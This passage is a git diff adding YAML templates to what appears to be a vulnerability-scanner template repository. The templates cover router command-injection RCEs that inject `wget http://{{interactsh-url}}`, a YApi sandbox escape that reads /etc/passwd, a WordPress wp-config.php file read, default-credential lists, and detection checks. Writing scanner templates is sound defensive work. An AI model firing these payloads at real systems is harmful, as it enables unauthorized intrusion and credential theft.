rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + + - | + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml new file mode 100644 index 0000000000..c658ea4e31 --- /dev/null +++ b/cves/2020/CVE-2020-26919.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-26919 + +info: + name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. + reference: | + - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,netgear,rce,oob + +requests: + - raw: + - | + POST /login.htm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd= + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml new file mode 100644 index 0000000000..d65d7e96c6 --- /dev/null +++ b/cves/2020/CVE-2020-35713.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-35713 + +info: + name: Linksys RE6500 Pre-Auth RCE + author: gy741 + severity: critical + reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html + description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + tags: cve,cve2020,linksys,rce,oob,router + +requests: + - raw: + - | + POST /goform/setSysAdm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/login.shtml + + admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml new file mode 100644 index 0000000000..d1d4550b3f --- /dev/null +++ b/cves/2021/CVE-2021-31755.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-31755 + +info: + name: Tenda Router AC11 RCE + description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: | + - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: cve,cve2021,tenda,rce,oob + +requests: + - raw: + - | + POST /goform/setmac HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/index.htmlr + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + Content-Type: application/x-www-form-urlencoded + + module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml new file mode 100644 index 0000000000..254903e532 --- /dev/null +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -0,0 +1,67 @@ +id: adobe-aem-default-credentials + +info: + name: Adobe AEM Default Credentials + author: random-robbie + severity: critical + tags: aem,default-login + reference: + +requests: + + - payloads: + + rr_username: + - admin + - grios + - replication-receiver + - vgnadmin + - aparker@geometrixx.info + - jdoe@geometrixx.info + - james.devore@spambob.com + - matt.monroe@mailinator.com + - aaron.mcdonald@mailinator.com + - jason.werner@dodgit.com + + rr_password: + - admin + - password + - replication-receiver + - vgnadmin + - aparker + - jdoe + - password + - password + - password + - password + + attack: pitchfork # Available options: sniper, pitchfork and clusterbomb + + raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/plain, */*; q=0.01 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Content-Length: 67 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + Connection: close + + _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - login-token + - crx.default + condition: and diff --git a/default-logins/dell/dell-emc-ecom-default-credentials.yaml b/default-logins/dell/dell-emc-ecom-default-credentials.yaml new file mode 100644 index 0000000000..5c46e83359 --- /dev/null +++ b/default-logins/dell/dell-emc-ecom-default-credentials.yaml @@ -0,0 +1,31 @@ +id: dell-emc-ecom-default-credentials + +info: + name: Dell EMC ECOM Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:#1Password on Dell EMC ECOM application. + reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation + tags: dell,emc,ecom,default-login + +requests: + - method: GET + path: + - '{{BaseURL}}' + headers: + Authorization: Basic YWRtaW46IzFQYXNzd29yZA== + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: ECOMSecurity" + part: header + + - type: word + words: + - "Welcome to ECOM" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml new file mode 100644 index 0000000000..132cee76fd --- /dev/null +++ b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml @@ -0,0 +1,31 @@ +id: hortonworks-smartsense-default-credentials + +info: + name: HortonWorks SmartSense Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on HortonWorks SmartSense application. + reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html + tags: hortonworks,smartsense,default-login + +requests: + - method: GET + path: + - '{{BaseURL}}/apt/v1/context' + headers: + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: SUPPORTSESSIONID" + part: header + + - type: word + words: + - "smartsenseId" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/default-logins/idemia/idemia-biometrics-default-credentials.yaml b/default-logins/idemia/idemia-biometrics-default-credentials.yaml new file mode 100644 index 0000000000..da3d4290e4 --- /dev/null +++ b/default-logins/idemia/idemia-biometrics-default-credentials.yaml @@ -0,0 +1,34 @@ +id: idemia-biometrics-default-credentials + +info: + name: IDEMIA BIOMetrics Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of password=12345 on IDEMIA BIOMetrics application. + reference: https://www.google.com/search?q=idemia+password%3D+"12345" + tags: idemia,biometrics,default-login + +requests: + - method: POST + path: + - '{{BaseURL}}/cgi-bin/login.cgi' + + body: password=12345 + + matchers-condition: and + matchers: + - type: word + words: + - "session_id=" + - "resource" + condition: and + + - type: word + words: + - "Invalid Password" + part: body + negative: true + + - type: status + status: + - 200 \ No newline at end of file diff --git a/default-logins/paloalto/panos-default-credentials.yaml b/default-logins/paloalto/panos-default-credentials.yaml new file mode 100644 index 0000000000..15bc58afa5 --- /dev/null +++ b/default-logins/paloalto/panos-default-credentials.yaml @@ -0,0 +1,31 @@ +id: panos-default-credentials + +info: + name: Palo Alto Networks PAN-OS Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application. + reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + tags: paloalto,panos,default-login + +requests: + - method: POST + path: + - '{{BaseURL}}/php/login.php' + + body: user=admin&passwd=admin&challengePwd=&ok=Login + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: PHPSESSID" + part: header + + - type: word + words: + - "Warning: Your device is still configured with the default admin" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/default-logins/ricoh/ricoh-weak-password.yaml b/default-logins/ricoh/ricoh-weak-password.yaml new file mode 100644 index 0000000000..a7db0ce8a6 --- /dev/null +++ b/default-logins/ricoh/ricoh-weak-password.yaml @@ -0,0 +1,28 @@ +id: ricoh-weak-password + +info: + name: Ricoh Weak Password + author: gy741 + severity: high + tags: ricoh,default-login + reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ + +requests: + - raw: + - | + POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: cookieOnOffChecker=on; + + wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open= + + matchers-condition: and + matchers: + - type: regex + regex: + - 'wimsesid=[0-9]+' + part: header + + - type: status + status: + - 302 diff --git a/default-logins/visionhub/visionhub-default-credentials.yaml b/default-logins/visionhub/visionhub-default-credentials.yaml new file mode 100644 index 0000000000..c4bb066e85 --- /dev/null +++ b/default-logins/visionhub/visionhub-default-credentials.yaml @@ -0,0 +1,27 @@ +id: visionhub-default-credentials + +info: + name: VisionHub Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on VisionHub application. + tags: visionhub,default-login + reference: https://www.qognify.com/products/visionhub/ + +requests: + - method: POST + path: + - '{{BaseURL}}/VisionHubWebApi/api/Login' + headers: + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: admin" + part: header + + - type: status + status: + - 200 \ No newline at end of file diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 64115ff057..a6e03e96ac 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -2,7 +2,7 @@ id: heroku-takeover info: name: heroku takeover detection - author: pdteam + author: 0xPrial,pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -15,7 +15,6 @@ requests: matchers: - type: word words: - - "There's nothing here, yet." - "herokucdn.com/error-pages/no-such-app.html" - "No such app" condition: and \ No newline at end of file diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml index 9c447ac42f..58c0306995 100644 --- a/takeovers/netlify-takeover.yaml +++ b/takeovers/netlify-takeover.yaml @@ -2,7 +2,7 @@ id: netlify-takeover info: name: netlify takeover detection - author: pdteam + author: 0xPrial,pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -16,9 +16,9 @@ requests: matchers: - type: word words: - - "Not Found" + - "Not found - Request ID:" - type: word words: - - "server: Netlify" + - "Netlify" part: header \ No newline at end of file diff --git a/technologies/aem-detection.yaml b/technologies/aem-detection.yaml new file mode 100644 index 0000000000..85399c2790 --- /dev/null +++ b/technologies/aem-detection.yaml @@ -0,0 +1,26 @@ +id: aem-detection + +info: + name: Favicon based AEM Detection + severity: info + author: shifacyclewala,hackergautam + tags: aem,favicon,tech + reference: | + - https://twitter.com/brsn76945860/status/1171233054951501824 + - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a + - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 + - https://github.com/devanshbatham/FavFreak + - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + +requests: + - method: GET + path: + - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml new file mode 100644 index 0000000000..721bac1466 --- /dev/null +++ b/technologies/node-red-detect.yaml @@ -0,0 +1,24 @@ +id: node-red-detect + +info: + name: Node RED Detect + author: pikpikcu + severity: info + tags: tech,apache + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Node-RED" + + - type: status + status: + - 200 diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml new file mode 100644 index 0000000000..5f57fd013e --- /dev/null +++ b/technologies/sap-igs-detect.yaml @@ -0,0 +1,39 @@ +id: sap-igs-detect + +info: + name: SAP Internet Graphics Server (IGS) Detection + author: _generic_human_ + description: Detection of SAP Internet Graphics Server (IGS) + severity: info + tags: sap,tech,igs + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SAP IGS" + - "is running" + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "SAP Internet Graphics Server" + + extractors: + - type: kval + part: header + kval: + - "Server" diff --git a/technologies/seeddms-detect.yaml b/technologies/seeddms-detect.yaml new file mode 100644 index 0000000000..307611e1d0 --- /dev/null +++ b/technologies/seeddms-detect.yaml @@ -0,0 +1,21 @@ +id: seeddms-detect +info: + name: Seeddms- + author: pussycat0x + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "SeedDMS: Sign in" + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/yapi-detect.yaml b/technologies/yapi-detect.yaml new file mode 100644 index 0000000000..fb38ed2157 --- /dev/null +++ b/technologies/yapi-detect.yaml @@ -0,0 +1,25 @@ +id: yapi-detect + +info: + name: YApi Detect + author: pikpikcu + severity: info + tags: tech,yapi + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}:3000" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "YApi-高效、易用、功能强大的可视化接口管理平台" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml new file mode 100644 index 0000000000..055c33da1e --- /dev/null +++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -0,0 +1,35 @@ +id: optilink-ont1gew-gpon-rce + +info: + name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution + author: gy741 + severity: critical + description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device. + reference: | + - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: optiLink,rce,oob + +requests: + - raw: + - | + POST /boaform/admin/formTracert HTTP/1.1 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Origin: http://{{Hostname}} + Connection: keep-alive + Referer: http://{{Hostname}}/diag_ping_admin_en.asp + Upgrade-Insecure-Requests: 1 + Host: {{Hostname}} + User: e8c + Password: e8c + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + + target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index a83e353f93..63fa6a1f77 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -1,4 +1,5 @@ id: showdoc-file-upload-rce + info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu @@ -20,7 +21,7 @@ requests: Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" Content-Type: text/plain - + ----------------------------835846770881083140190633-- - | @@ -37,11 +38,12 @@ requests: regex: - '/Uploads\\(.*?)"\,"success"' - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body_2, "PHP Extension")' - - 'contains(body_2, "PHP Version")' - - 'status_code_2 == 200' - condition: and + - type: word + words: + - '3c7cb9f46815a790686b857fdbc4295a' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml new file mode 100644 index 0000000000..e7ad5c1b20 --- /dev/null +++ b/vulnerabilities/other/yapi-rce.yaml @@ -0,0 +1,110 @@ +id: yapi-rce + +info: + name: Yapi Remote Code Execution + author: pikpikcu + severity: critical + tags: yapi,rce + reference: | + - https://www.secpulse.com/archives/162502.html + - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b + - https://twitter.com/sec715/status/1415484190561161216 + - https://github.com/YMFE/yapi + +requests: + - raw: + - | # REQUEST 1 + POST /api/user/reg HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} + + - | # REQUEST 2 + GET /api/group/list HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: application/json, text/plain, */* + Accept-Encoding: gzip + + - | # REQUEST 3 + POST /api/project/add HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 106 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + + - | # REQUEST 4 + GET /api/project/get?id={{project_id}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip + + - | # REQUEST 5 + POST /api/interface/add HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 89 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + + - | # REQUEST 6 + POST /api/plugin/advmock/save HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 382 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + + - | # REQUEST 7 + GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip + + cookie-reuse: true + extractors: + - type: regex + name: group_id + group: 1 + internal: true + part: body + regex: + - '"_id":([0-9]+),"group_name"' + + - type: regex + name: interface_id + group: 1 + internal: true + part: body + regex: + - '"req_body_form":\[\],"_id":([0-9]+)' + + - type: regex + name: project_id + group: 1 + internal: true + part: body + regex: + - '"tag":\[\],"_id":([0-9]+)' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml new file mode 100644 index 0000000000..4091668e07 --- /dev/null +++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -0,0 +1,30 @@ +id: wp-memphis-documents-library-lfi + +info: + name: WordPress Plugin Memphis Document Library 3.1.5 LFI + author: 0x_Akoko + severity: high + tags: wordpress,wp-plugin,lfi + description: Arbitrary file download in Memphis Document Library 3.1.5 + reference: | + - https://www.exploit-db.com/exploits/39593 + - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f + +requests: + - method: GET + path: + - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php' + - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml index c0f15c89d2..ff8f7019c7 100644 --- a/workflows/aem-workflow.yaml +++ b/workflows/aem-workflow.yaml @@ -7,4 +7,6 @@ info: tags: workflow workflows: - - template: misconfiguration/aem/ \ No newline at end of file + - template: technologies/aem-detection.yaml + subtemplates: + - tags: aem \ No newline at end of file